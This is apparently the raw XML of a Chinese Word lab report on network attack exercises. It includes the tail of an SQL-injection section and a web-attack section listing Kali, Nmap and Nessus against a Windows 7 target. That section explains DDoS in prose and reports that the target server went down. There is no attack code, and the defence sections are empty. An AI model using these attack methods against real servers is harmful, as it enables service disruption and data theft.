          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>简单的Sql注入；反馈给我们数据库里存储的一些重要信息</w:t>
      </w:r>
      <w:r w:rsidR="00AF2C62">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0652C" w14:textId="77777777" w:rsidR="00F755A7" w:rsidRDefault="00F755A7" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07CA8BA5" w14:textId="7E8C2E6E" w:rsidR="00AF2C62" w:rsidRPr="00AF2C62" w:rsidRDefault="00AF2C62" w:rsidP="008C0A76">
      <w:pPr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62DE2546" wp14:editId="176B8577">
            <wp:extent cx="5274310" cy="17856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EBCC" w14:textId="3DEAFB3E" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc76889976"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.5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防守措施</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="7AB55FDF" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47EC62B6" w14:textId="1B2BF2DD" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc76889977"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>5.6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再次验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="0010BDB7" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F794C94" w14:textId="5A2CDB1E" w:rsidR="00A45519" w:rsidRPr="00A72932" w:rsidRDefault="00A45519" w:rsidP="00A45519">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc76889978"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Web网站攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="63E49A9C" w14:textId="1D4AB627" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc76889979"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>6.1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原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="563AB123" w14:textId="59C639D3" w:rsidR="008C0A76" w:rsidRDefault="00F755A7" w:rsidP="008C0A76">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42F116AF" wp14:editId="077F799B">
            <wp:extent cx="4945487" cy="221488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5414" cy="22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42A0" w14:textId="77777777" w:rsidR="00F755A7" w:rsidRPr="008C0A76" w:rsidRDefault="00F755A7" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540C3880" w14:textId="24AA7152" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc76889980"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>6.2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双方软件环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="28AB4E0A" w14:textId="77777777" w:rsidR="00F755A7" w:rsidRPr="006221AE" w:rsidRDefault="00F755A7" w:rsidP="00F755A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>攻方系统和软件环境：</w:t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 w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kali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+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Nmap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+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Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CA15F4" w14:textId="29D2646F" w:rsidR="008C0A76" w:rsidRPr="00F755A7" w:rsidRDefault="00F755A7" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>防方系统环境：</w:t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/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006221AE">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE9DF1" w14:textId="112BBFAA" w:rsidR="00437F72" w:rsidRDefault="005E252A" w:rsidP="00437F72">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc76889981"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>6.3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操作步骤</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="2F151F50" w14:textId="77777777" w:rsidR="00437F72" w:rsidRPr="00437F72" w:rsidRDefault="00437F72" w:rsidP="00437F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDOS 攻击，它在短时间内发起大量请求，耗尽服务器的资源，无法响应正常的访问，造成网站实质下线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F188D" w14:textId="77777777" w:rsidR="00437F72" w:rsidRPr="00437F72" w:rsidRDefault="00437F72" w:rsidP="00437F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437F72">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DDOS 里面的 DOS 是 denial of service（停止服务）的缩写，表示这种攻击的目的，就是使得服务中断。最前面的那个 D 是 distributed （分布式），表示攻击不是来自一个地方，而是来自四面八方，因此更难防。你关了前门，他从后门进来；你关了后门，他从窗口跳起来。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566488D1" w14:textId="77777777" w:rsidR="00437F72" w:rsidRPr="00437F72" w:rsidRDefault="00437F72" w:rsidP="00437F72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FF653D" w14:textId="77B16E8F" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc76889982"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>6.4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验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="6CEB49C6" w14:textId="3FD0C471" w:rsidR="008C0A76" w:rsidRPr="008E765F" w:rsidRDefault="00437F72" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E765F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>验证成功，目标服务器在Ddos洪泛攻击下宕机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB92AD" w14:textId="197A2B71" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc76889983"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>6.5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防守措施</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="7EE140EC" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6296D58E" w14:textId="2284AAC0" w:rsidR="005E252A" w:rsidRDefault="005E252A" w:rsidP="005E252A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc76889984"/>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>6.6</w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A72932">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>再次验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="56975BE5" w14:textId="77777777" w:rsidR="008C0A76" w:rsidRPr="008C0A76" w:rsidRDefault="008C0A76" w:rsidP="008C0A76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9639C4" w14:textId="5432D970" w:rsidR="00A45519" w:rsidRPr="005E252A" w:rsidRDefault="00A45519"/>
    <w:p w14:paraId="3DCC713C" w14:textId="6720D293" w:rsidR="00A45519" w:rsidRDefault="00A45519"/>
    <w:p w14:paraId="713B520D" w14:textId="0BC7B835" w:rsidR="00A45519" w:rsidRDefault="00A45519"/>
    <w:p w14:paraId="07F289EC" w14:textId="7EA1CCD7" w:rsidR="00A45519" w:rsidRDefault="00A45519"/>
    <w:p w14:paraId="203C5775" w14:textId="77777777" w:rsidR="00A45519" w:rsidRDefault="00A45519"/>
    <w:sectPr w:rsidR="00A45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E140D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BBC86FBA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="557" w:hanging="5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7" w:hanging="5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8567D4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A5ED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4C"/>
    <w:rsid w:val="000E0E28"/>
    <w:rsid w:val="0031259D"/>
    <w:rsid w:val="00437F72"/>
    <w:rsid w:val="004434D0"/>
    <w:rsid w:val="005E252A"/>
    <w:rsid w:val="006221AE"/>
    <w:rsid w:val="00746748"/>
    <w:rsid w:val="00747D4C"/>
    <w:rsid w:val="00816B69"/>
    <w:rsid w:val="008C0A76"/>
    <w:rsid w:val="008E765F"/>
    <w:rsid w:val="00971052"/>
    <w:rsid w:val="009F4A17"/>
    <w:rsid w:val="00A45519"/>
    <w:rsid w:val="00A72932"/>
    <w:rsid w:val="00AF2C62"/>
    <w:rsid w:val="00B91911"/>
    <w:rsid w:val="00C54B87"/>
    <w:rsid w:val="00CD6071"/>
    <w:rsid w:val="00DB5503"/>
    <w:rsid w:val="00E06F34"/>
    <w:rsid w:val="00EB6868"/>
    <w:rsid w:val="00F7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A199CC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E50F8B68-E315-4A1B-8778-B0847E2A8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5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55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25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55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E252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E25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B55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5503"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB5503"/>
    <w:pPr>
      <w:ind w:leftChars="200" w:left="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a4">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DB550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B550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Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004434D0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37F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zh.wikipedia.org/wiki/%E9%98%BF%E6%8B%89%E4%BC%AF%E6%95%B0%E5%AD%97" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E8%AE%A1%E7%AE%97%E6%9C%BA" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F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9%BB%91%E5%AE%A2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zh.wikipedia.org/wiki/%E5%AF%86%E7%A0%81%E5%88%86%E6%9E%90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zh.wikipedia.org/w/index.php?title=%E9%9A%90%E7%A7%98%E6%80%A7&amp;action=edit&amp;redlink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.wikipedia.org/w/index.php?title=%E5%AD%97%E5%85%B8%E6%94%BB%E6%93%8A&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%A8%8B%E5%BA%8F" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8/61381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h.wikipedia.org/w/index.php?title=%E8%BF%90%E8%A1%8C&amp;action=edit&amp;redlink=1" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E9%9B%BB%E8%85%A6%E7%97%85%E6%AF%92" TargetMode="Externa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zh.wikipedia.org/wiki/%E8%AE%A1%E7%AE%97%E6%9C%BA" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E4%BC%A0%E6%92%AD" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/SQL%E8%AF%AD%E5%8F%A5/5714895" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E6%BC%8F%E6%B4%9E" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E5%90%8E%E9%97%A8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8%AE%A1%E7%AE%97%E6%9C%BA%E5%AE%89%E5%85%A8" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E5%AE%8C%E5%96%84%E4%BF%9D%E5%AF%86%E6%80%A7" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://zh.wikipedia.org/wiki/%E9%9B%BB%E5%AD%90%E8%A8%AD%E5%82%99" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://baike.baidu.com/item/web%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/2498090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28B26-1BF6-4140-A5E5-62A07AB1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4</Pages>
  <Words>1258</Words>
  <Characters>7175</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>59</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop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斌</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>吴 斌</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-11T02:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-11T07:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>